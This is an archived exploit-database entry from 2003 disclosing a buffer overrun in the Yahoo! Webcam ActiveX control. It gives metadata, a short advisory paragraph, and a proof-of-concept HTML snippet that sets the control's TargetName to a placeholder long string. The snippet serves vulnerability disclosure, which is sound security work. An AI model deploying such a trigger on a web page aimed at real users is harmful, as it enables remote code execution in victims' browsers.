Yahoo! Webcam ActiveX Control 2.0.0.107 - Buffer Overrun

Author: cesaro
type: remote
platform: windows
port: 
date_added: 2003-09-16  
date_updated: 2012-12-04  
verified: 1  
codes: OSVDB-2566  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 23152.txt  
source: https://www.securityfocus.com/bid/8634/info

A buffer overrun has been discovered in the Yahoo! Webcam ActiveX control. The problem occurs due to insufficient bounds checking when handling user-supplied Webcam parameters. As a result, an attacker may be capable of hosting a malicious website designed to exploit this issue to execute arbitrary code, within the context of a victim users web browser.


<object id="yahoowebcam"
classid="CLSID:E504EE6E-47C6-11D5-B8AB-00D0B78F3D48" >
</object>
<script>
yahoowebcam.TargetName="longstringhere";
</script>